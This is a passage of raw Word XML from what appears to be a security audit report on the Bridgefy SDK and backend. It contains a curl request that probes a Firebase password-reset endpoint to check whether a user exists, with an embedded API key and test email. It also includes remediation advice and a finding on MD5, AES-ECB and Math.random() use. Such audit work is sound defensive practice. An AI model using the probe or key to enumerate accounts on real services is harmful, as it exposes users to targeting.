        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -s -k -X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'POST' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>-H </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'Content-Type: application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>'{"requestType":"PASSWORD_RESET","email":"</w:t>
      </w:r>
      <w:hyperlink r:id="rId164">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:b/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>oscar+b2@7asecurity.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId167">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>'https://www.googleapis.com/identitytoolkit/v3/relyingparty/getOobConfirmationCode?key=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> AIzaSyCco5iR98OSW_Jujby4V9sXVO6EtNJYhmU'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exists):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="917" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"kind"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"identitytoolkit#GetOobConfirmationCodeResponse"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"email"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:hyperlink r:id="rId164">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Consolas"/>
            <w:color w:val="DE4F00"/>
            <w:sz w:val="18"/>
          </w:rPr>
          <w:t>"oscar+b2@7asecurity.com"</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="365" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>It is recommended to return only generic messages regardless of user existence. For example, the password reset endpoint could return a message like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>“If the e-mail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="40"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>provided exists in our systems then you should receive an e-mail to reset your password”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. This ensures the system remains friendly to users while preventing the disclosure of user presence in the application. Please note that this issue could be resolved</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>switching</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Firebase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>then</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enabling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>email enumeration protection in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Google Identity Platform </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>settings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>100101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. For additional mitigation guidance, please see the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Authentication and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP Authentication Cheat Sheet.</w:t>
      </w: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spacing w:before="50"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487614464">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>193452</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="76" name="Graphic 76"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="76" name="Graphic 76"/>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5.232451pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15702016;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape61" coordorigin="1440,305" coordsize="2880,0" path="m1440,305l4320,305e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="59"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId168">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cloud.google.com/identity-platform/docs/admin/email-enumeration-protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="43"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId169">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cloud.google.com/identity-platform/docs/product-comparison</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>102</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId170">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#auth...</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="182"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250029" w:id="26"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP3/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Insecure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Crypto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Functions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>PRNG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was established that the Bridgefy backend SDK makes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cryptographic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>functions with known security weaknesses. One example of this is MD5, which is an obsolete hashing algorithm with known weaknesses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>103</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Another example is that the SDK uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Electronic Code Book </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>(ECB) for AES encryption, this is inherently weak, as it produces the same cipher-text for identical blocks of plain-text, hence it is unsuitable for security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>purposes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>104</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Furthermore, the code audit revealed that license values are generated with the weak random number generator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Math.random()</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. This does not provide secure random numbers in terms of a cryptographically-secure pseudorandom number generator (CSPRNG)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>105</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Usage of these suboptimal choices makes the security of the application more brittle and should be avoided. Additionally, during the documentation review, no automated process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
